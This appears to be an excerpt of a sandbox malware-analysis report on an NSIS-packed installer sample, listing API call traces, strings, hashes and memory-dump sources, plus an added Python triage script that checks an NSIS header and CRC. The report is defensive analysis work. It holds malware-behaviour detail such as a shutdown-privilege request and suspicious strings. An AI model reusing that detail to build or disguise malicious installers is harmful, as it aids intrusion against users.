4537 404e42 CreatePopupMenu 4528->4537 4529->4518 4534 4038a0 SendMessageW 4531->4534 4533 404a73 25 API calls 4532->4533 4533->4531 4534->4520 4538 4038c7 19 API calls 4535->4538 4536->4535 4539 4060ca 18 API calls 4537->4539 4540 404ce2 4538->4540 4541 404e52 AppendMenuW 4539->4541 4542 404ceb ShowWindow 4540->4542 4543 404d1f GetDlgItem SendMessageW 4540->4543 4544 404e65 GetWindowRect 4541->4544 4545 404e78 4541->4545 4546 404d01 ShowWindow 4542->4546 4547 404d0e 4542->4547 4543->4530 4549 404d42 SendMessageW SendMessageW 4543->4549 4548 404e7f TrackPopupMenu 4544->4548 4545->4548 4546->4547 4557 403920 SendMessageW 4547->4557 4548->4530 4550 404e9d 4548->4550 4549->4530 4552 404eb9 SendMessageW 4550->4552 4552->4552 4553 404ed6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4552->4553 4554 404efb 
SendMessageW 4553->4554 4554->4554 4555 404f26 GlobalUnlock SetClipboardData CloseClipboard 4554->4555 4555->4530 4556->4515 4557->4543 4558->4516 4559 4017b6 4560 40145c 18 API calls 4559->4560 4561 4017bd 4560->4561 4562 405b98 2 API calls 4561->4562 4563 4017c3 4562->4563 4564 402bb6 4565 401446 18 API calls 4564->4565 4566 402bbd 4565->4566 4567 4060ca 18 API calls 4566->4567 4568 401721 4566->4568 4567->4568 4569 401639 4570 404a73 25 API calls 4569->4570 4571 401641 4570->4571 4572 40243c 4573 40145c 18 API calls 4572->4573 4574 402454 4573->4574 4575 40145c 18 API calls 4574->4575 4576 40245e 4575->4576 4577 40145c 18 API calls 4576->4577 4578 402469 GetPrivateProfileStringW lstrcmpW 4577->4578

                    Control-flow Graph
                    • Function: 00403415 (graph rendering and edge list omitted)
                    APIs
                    • #17.COMCTL32 ref: 00403434
                    • SetErrorMode.KERNELBASE(00008001), ref: 0040343F
                    • OleInitialize.OLE32(00000000), ref: 00403446
                      • Part of subcall function 00405BBF: GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
                      • Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
                      • Part of subcall function 00405BBF: GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB
                    • SHGetFileInfoW.SHELL32(0040856C,00000000,?,000002B4,00000000), ref: 0040346E
                      • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                    • GetCommandLineW.KERNEL32(004732A0,NSIS Error), ref: 00403483
                    • GetModuleHandleW.KERNEL32(00000000,004CC0A0,00000000), ref: 00403496
                    • CharNextW.USER32(00000000,004CC0A0,00000020), ref: 004034BD
                    • GetTempPathW.KERNEL32(00002004,004E00C8,00000000,00000020), ref: 00403590
                    • GetWindowsDirectoryW.KERNEL32(004E00C8,00001FFF), ref: 004035A5
                    • lstrcatW.KERNEL32(004E00C8,\Temp), ref: 004035B1
                    • DeleteFileW.KERNELBASE(004DC0C0), ref: 004035C8
                    • CoUninitialize.COMBASE(?), ref: 00403659
                    • ExitProcess.KERNEL32 ref: 00403679
                    • lstrcatW.KERNEL32(004E00C8,~nsu.tmp), ref: 00403685
                    • lstrcmpiW.KERNEL32(004E00C8,004D80B8,004E00C8,~nsu.tmp), ref: 00403691
                    • CreateDirectoryW.KERNEL32(004E00C8,00000000), ref: 0040369D
                    • SetCurrentDirectoryW.KERNEL32(004E00C8), ref: 004036A4
                    • DeleteFileW.KERNEL32(0043BD40,0043BD40,?,00480008,0040850C,0047C000,?), ref: 004036F5
                    • CopyFileW.KERNEL32(004E80D8,0043BD40,00000001), ref: 00403709
                    • CloseHandle.KERNEL32(00000000,0043BD40,0043BD40,?,0043BD40,00000000), ref: 00403736
                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 0040378C
                    • ExitWindowsEx.USER32(00000002,00000000), ref: 004037C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                    • API String ID: 2435955865-3712954417

                    Control-flow Graph
                    • Function: 00405B98 (graph rendering and edge list omitted)
                    APIs
                    • FindFirstFileW.KERNELBASE(?,00464A20,0045FE18,00406093,0045FE18), ref: 00405BA3
                    • FindClose.KERNEL32(00000000), ref: 00405BAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID: JF
                    • API String ID: 2295610775-1378213080

                    Control-flow Graph
                    • Function: 00405BBF (graph rendering and edge list omitted)
                    APIs
                    • GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
                    • LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: AddressHandleLibraryLoadModuleProc
                    • String ID:
                    • API String ID: 310444273-0
                    • Opcode ID: 0ccf96f21d4775823ebfa39c65d9289fef824585f99c9f9fa051364898666991
                    • Instruction ID: e5a37bd0471b14276c9a44c6b696aa1abbb9d0f0bd66a2a471ce49017894d203
                    • Opcode Fuzzy Hash: 0ccf96f21d4775823ebfa39c65d9289fef824585f99c9f9fa051364898666991
                    • Instruction Fuzzy Hash: 9DE08C32600A1297DA101B609E0896B777CAB89640302C43EF545B2011DB34B825ABAD

                    Control-flow Graph
                    (graph image not reproduced; the executed / not-executed colouring did not survive extraction)
                    • Function 004053F8, blocks 4053f8-4056eb; subcalls 00405BBF, 004059FF, 00405981, 004039FC, 00406042, 004060CA, 0040141D, 004057B3, 00405FE6, 00405AB8, 00406015, 00404B48, 004037F0; API nodes lstrcatW, lstrlenW, lstrcmpiW, GetFileAttributesW, LoadImageW, RegisterClassW, SystemParametersInfoW, CreateWindowExW, ShowWindow, LoadLibraryW, GetClassInfoW, DialogBoxParamW (see APIs below)
                    APIs
                      • Part of subcall function 00405BBF: GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
                      • Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
                      • Part of subcall function 00405BBF: GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB
                    • lstrcatW.KERNEL32(004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000,00000006,004CC0A0,00000002,004E00C8,00403650,?), ref: 0040547C
                    • lstrlenW.KERNEL32(LimePhillips,?,?,?,LimePhillips,00000000,004D00A8,004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000,00000006,004CC0A0), ref: 004054FF
                    • lstrcmpiW.KERNEL32(?,.exe,LimePhillips,?,?,?,LimePhillips,00000000,004D00A8,004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000), ref: 00405512
                    • GetFileAttributesW.KERNEL32(LimePhillips), ref: 0040551D
                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D00A8), ref: 0040556F
                      • Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C
                    • RegisterClassW.USER32(00473240), ref: 004055BF
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004055D6
                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00405608
                      • Part of subcall function 004039FC: SetWindowTextW.USER32(00000000,004732A0), ref: 00403A97
                    • ShowWindow.USER32(00000005,00000000), ref: 0040563E
                    • LoadLibraryW.KERNEL32(RichEd20), ref: 0040564F
                    • LoadLibraryW.KERNEL32(RichEd32), ref: 0040565A
                    • GetClassInfoW.USER32(00000000,RichEdit20A,00473240), ref: 00405669
                    • GetClassInfoW.USER32(00000000,RichEdit,00473240), ref: 00405676
                    • RegisterClassW.USER32(00473240), ref: 00405683
                    • DialogBoxParamW.USER32(?,00000000,00404F45,00000000), ref: 004056A2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                    • String ID: .DEFAULT\Control Panel\International$.exe$@2G$Control Panel\Desktop\ResourceLocale$LimePhillips$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                    • API String ID: 608394941-1413194003
                    • Opcode ID: c9e60b1b3c0f802fbfd7db3f6b9b6b56d484588749bd373d4ce2741afa478592
                    • Instruction ID: 3004e29146ce1891a10f4484e48a0599eb6fbea5d6fbf796412b55f756561b6a
                    • Opcode Fuzzy Hash: c9e60b1b3c0f802fbfd7db3f6b9b6b56d484588749bd373d4ce2741afa478592
                    • Instruction Fuzzy Hash: 7F7104B0601A11BED710ABA5AD46F6F366CEB44304F40043BF949B62E2DB794D818FAD

                    Control-flow Graph
                    (graph image not reproduced; the executed / not-executed colouring did not survive extraction)
                    • Function 00402EE7, blocks 402ee7-403119; subcalls 00402ED0, 00402E9E, 00406B32, 00404A73; API nodes GetTickCount (two sites), MulDiv, wsprintfW, WriteFile (two sites), see APIs below
                    APIs
                    • GetTickCount.KERNEL32 ref: 00402F59
                    • GetTickCount.KERNEL32 ref: 00402FFA
                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403023
                    • wsprintfW.USER32 ref: 00403036
                    • WriteFile.KERNELBASE(00000000,00000000,00423179,004032FA,00000000), ref: 00403067
                    • WriteFile.KERNEL32(00000000,0041E170,?,00000000,00000000,0041E170,?,000000FF,00000004,00000000,00000000,00000000), ref: 004030FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CountFileTickWrite$wsprintf
                    • String ID: (=C$... %d%%$p!B$pA$pA$y1B
                    • API String ID: 651206458-4072891166
                    • Opcode ID: 8c4c8dbab1ebe0afa4682773c2b87886d0ac197ebae181545411c68e098dc53f
                    • Instruction ID: 169c75f2852f129af83c9b1986440f01f3d96746b5d1a97a5bed7113fa09ea58
                    • Opcode Fuzzy Hash: 8c4c8dbab1ebe0afa4682773c2b87886d0ac197ebae181545411c68e098dc53f
                    • Instruction Fuzzy Hash: 1C617B7190121AEBCF10CF65EA446AF7BB8AF44751F14413BE900B72D0D7B89A40DBA9

                    Control-flow Graph
                    (graph image not reproduced; the executed / not-executed colouring did not survive extraction)
                    • Function 0040311B, blocks 40311b-40335e; subcalls 004058FE, 00405AB8, 00406015, 00402E3A, 00402E9E, 00402ED0, 00402EE7, 004058BA, 00406739; API nodes GetTickCount, GetModuleFileNameW, GetFileSize, GlobalAlloc, SetFilePointer; the "Error launching installer" block 40316b-403170 is entered directly from the opening block, the "Installer integrity check has failed" block 403359-40335e from the read loop
                    APIs
                    • GetTickCount.KERNEL32 ref: 0040312C
                    • GetModuleFileNameW.KERNEL32(00000000,004E80D8,00002004,?,?,?,00000000,004035D7,?), ref: 00403148
                      • Part of subcall function 004058FE: GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
                      • Part of subcall function 004058FE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924
                    • GetFileSize.KERNEL32(00000000,00000000,004EC0E0,00000000,004D80B8,004D80B8,004E80D8,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00403194
                    Strings
                    • Inst, xrefs: 00403200
                    • Null, xrefs: 00403212
                    • soft, xrefs: 00403209
                    • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 00403359
                    • Error launching installer, xrefs: 0040316B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                    • API String ID: 4283519449-527102705
                    • Opcode ID: 689548250178369e8610e5746f9adce2578bd5dbf9f68dd3f6bd973dda8ba485
                    • Instruction ID: 9295a41ff54e91ce474836f10c0d971f7d59360bd190e5c91fe05c233bc104c6
                    • Opcode Fuzzy Hash: 689548250178369e8610e5746f9adce2578bd5dbf9f68dd3f6bd973dda8ba485
                    • Instruction Fuzzy Hash: 4D51D771900208ABDB119FA5DD85BAE7BA8EF04716F14417FE904B62D1DB7C8E808B9D

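The block above is the NSIS stub's start-up self-check: it opens its own image (GetModuleFileNameW, CreateFileW, GetFileSize), reads it in a loop, compares three consecutive dwords against "Inst", "soft" and "Null" (the xrefs at 00403200, 00403209 and 00403212), reports "Error launching installer" when the open or read fails and "Installer integrity check has failed" when the trailing checksum does not match. The script below reproduces that header search and checksum over a file image so the same test can be run on a dropped or submitted file during triage. It is an added example, not code from the sample or from Joe Sandbox; the firstheader layout, the 0xDEADBEEF signature, the flag bits, the 512-byte scan step and the trailing little-endian CRC32 are taken from the public NSIS exehead source (Source/exehead/fileform.h and Main.c), not from this report, and the test image it builds is constructed, not the analysed sample.

```python
"""Locate and check an NSIS 'firstheader' inside a file image.

Added triage example; not code from the sample or from Joe Sandbox.
Assumed from the public NSIS exehead source (fileform.h / Main.c), not from
this report: the struct layout, the 0xDEADBEEF signature, the flag bits,
the 512-byte scan step and the trailing little-endian CRC32.
"""
import struct
import zlib

FH_SIG = 0xDEADBEEF
FH_MAGIC = b"NullsoftInst"   # nsinst[0..2] as raw bytes: "Null", "soft", "Inst"
FH_FLAGS_MASK = 0x0F         # UNINSTALL=1, SILENT=2, NO_CRC=4, FORCE_CRC=8
FH_FLAGS_NO_CRC = 0x04
FH_FLAGS_FORCE_CRC = 0x08
FH_SIZE = 28                 # seven little-endian 32-bit fields
SCAN_STEP = 512              # the stub reads 512-byte chunks until the header is found


def find_nsis_firstheader(data: bytes):
    """Offset of the firstheader, or None if the image is not NSIS-shaped.

    Same predicate the stub uses: the header sits on a 512-byte boundary,
    no reserved flag bits are set, siginfo == FH_SIG, and the three nsinst
    dwords spell Null/soft/Inst (the sample compares them in the order
    Inst, soft, Null, as the xrefs at 00403200-00403212 show).
    """
    for off in range(0, len(data) - FH_SIZE + 1, SCAN_STEP):
        flags, sig = struct.unpack_from("<II", data, off)
        if (flags & ~FH_FLAGS_MASK) == 0 and sig == FH_SIG \
                and data[off + 8:off + 20] == FH_MAGIC:
            return off
    return None


def parse_firstheader(data: bytes, off: int) -> dict:
    """Decode the seven dwords at `off` into a dict."""
    flags, _sig, _n1, _n2, _n3, hdr_len, data_len = struct.unpack_from("<7I", data, off)
    return {
        "offset": off,
        "flags": flags,
        "length_of_header": hdr_len,
        "length_of_all_following_data": data_len,
    }


def verify_nsis_crc(data: bytes) -> bool:
    """Recompute the integrity check the stub performs before extracting.

    CRC32 is taken over every byte except the last four; those four hold
    the expected value little-endian. A header flagged NO_CRC (without
    FORCE_CRC) carries no checksum and is accepted without one, which is
    also what the stub does.
    """
    off = find_nsis_firstheader(data)
    if off is None:
        return False
    flags = parse_firstheader(data, off)["flags"]
    if flags & FH_FLAGS_NO_CRC and not flags & FH_FLAGS_FORCE_CRC:
        return True
    if len(data) < off + FH_SIZE + 4:
        return False
    stored = struct.unpack_from("<I", data, len(data) - 4)[0]
    return (zlib.crc32(data[:-4]) & 0xFFFFFFFF) == stored


def build_test_image(stub_len: int = 1024, payload: bytes = b"\x00" * 64) -> bytes:
    """Constructed test image (not the analysed sample, contains no code):
    a zero-filled 'stub', a firstheader on a 512-byte boundary, an opaque
    payload, then the CRC appended the way makensis does."""
    header = (struct.pack("<II", 0, FH_SIG) + FH_MAGIC
              + struct.pack("<II", 16, len(payload)))
    body = b"\x00" * stub_len + header + payload
    return body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_image()
    off = find_nsis_firstheader(image)
    print("firstheader:", None if off is None else parse_firstheader(image, off))
    print("crc ok:", verify_nsis_crc(image))
```

Run it against the submitted file with `python nsis_check.py wWk9NkXYcL.exe`. A header on a 512-byte boundary plus a matching trailing CRC says only that the image is an unmodified NSIS build; the script-driven content that follows the header is still compressed and opaque to this check, so it is a classification aid, not a verdict.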
                    APIs
                    • lstrcatW.KERNEL32(00000000,00000000,FerryTrioStomachElectionRoute,004D40B0,00000000,00000000), ref: 00401917
                    • CompareFileTime.KERNEL32(-00000014,?,FerryTrioStomachElectionRoute,FerryTrioStomachElectionRoute,00000000,00000000,FerryTrioStomachElectionRoute,004D40B0,00000000,00000000), ref: 00401946
                      • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                      • Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00423179,771B23A0,00000000), ref: 00404AAB
                      • Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00423179,771B23A0,00000000), ref: 00404ABB
                      • Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D,0040304D,00447D88,00423179,771B23A0,00000000), ref: 00404ACE
                      • Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
                      • Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
                      • Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
                      • Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                    • String ID: FerryTrioStomachElectionRoute
                    • API String ID: 1941528284-1160383050
                    • Opcode ID: 4e2e2bfaca04459f9316266c88af64ec5a68e37a9f2f48202c4a4d3150a7de52
                    • Instruction ID: b4e8f227fe7a9537edd0b9e90a91ba8e6819ca8d144e35aa4a9caf99775b3aa4
                    • Opcode Fuzzy Hash: 4e2e2bfaca04459f9316266c88af64ec5a68e37a9f2f48202c4a4d3150a7de52
                    • Instruction Fuzzy Hash: 6941C471A00614AADB10AB758C85EAF3668EF45329F20423BF416B11E2C77C4A91DFAD

                    Control-flow Graph
                    (graph image not reproduced; the executed / not-executed colouring did not survive extraction)
                    • Function 0040172D, blocks 40172d-4017b1, exiting to 402c58-402c67; subcalls 0040145C, 00405807, 004057B3, 00401435, 00405AB8; API nodes CreateDirectoryW, GetLastError, GetFileAttributesW, SetCurrentDirectoryW (see APIs below)
                    APIs
                      • Part of subcall function 00405807: CharNextW.USER32(?,004CC0A0,0045FE18,?,00406059,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 00405815
                      • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 0040581A
                      • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 00405832
                    • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000), ref: 00401757
                    • GetLastError.KERNEL32 ref: 00401761
                    • GetFileAttributesW.KERNELBASE(00000000), ref: 0040176F
                    • SetCurrentDirectoryW.KERNELBASE(00000000,004D40B0,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040179F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                    • String ID:
                    • API String ID: 3751793516-0
                    • Opcode ID: ec289c12e333ee4ac1693090613418d4a5d7498326967ec6e3adcff5c70bf25f
                    • Instruction ID: e2322852a9c4e47e6d687db6679f044b16e0241981b9ece66bf6cd58216f8cce
                    • Opcode Fuzzy Hash: ec289c12e333ee4ac1693090613418d4a5d7498326967ec6e3adcff5c70bf25f
                    • Instruction Fuzzy Hash: 3F01D631904621DBE7206B755D45B6F32A8EF14365B21063BF992F22E2D73C4C81866D

                    Control-flow Graph
                    (graph image not reproduced; the executed / not-executed colouring did not survive extraction)
                    • Function 0040592D, blocks 40592d-40597f; the GetTickCount / GetTempFileNameW block 40593a-40596e is re-entered from 405970-405972, i.e. the name is retried in a loop until GetTempFileNameW succeeds (see APIs below)
                    APIs
                    • GetTickCount.KERNEL32 ref: 0040594B
                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403392,004DC0C0,004E00C8), ref: 00405966
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: nsa
                    • API String ID: 1716503409-2209301699
                    • Opcode ID: 8f9989655f15aadf8d0cc60edb10422ff76ceb60520498c0bcc2ef1eb9998b51
                    • Instruction ID: 0cdccb08d4a0cf0f0df5d656a0a7939b265b1f1c47613fc9c1e0506998bbacb4
                    • Opcode Fuzzy Hash: 8f9989655f15aadf8d0cc60edb10422ff76ceb60520498c0bcc2ef1eb9998b51
                    • Instruction Fuzzy Hash: C9F06276610608EBDB109F55DE05E9B7BA9EF94720F00803BE984A7190E6B099548B58

                    Control-flow Graph
                    (graph image not reproduced; the executed / not-executed colouring did not survive extraction)
                    • Function 00401CC9, blocks 401cc9-401d71 plus 401721-401728, exiting to 402c58-402c67; subcalls 004060CA, 00405AB8 (three sites); API nodes GlobalAlloc, GlobalFree (see APIs below)
                    APIs
                    • GlobalAlloc.KERNELBASE(00000040,0000400C), ref: 00401D50
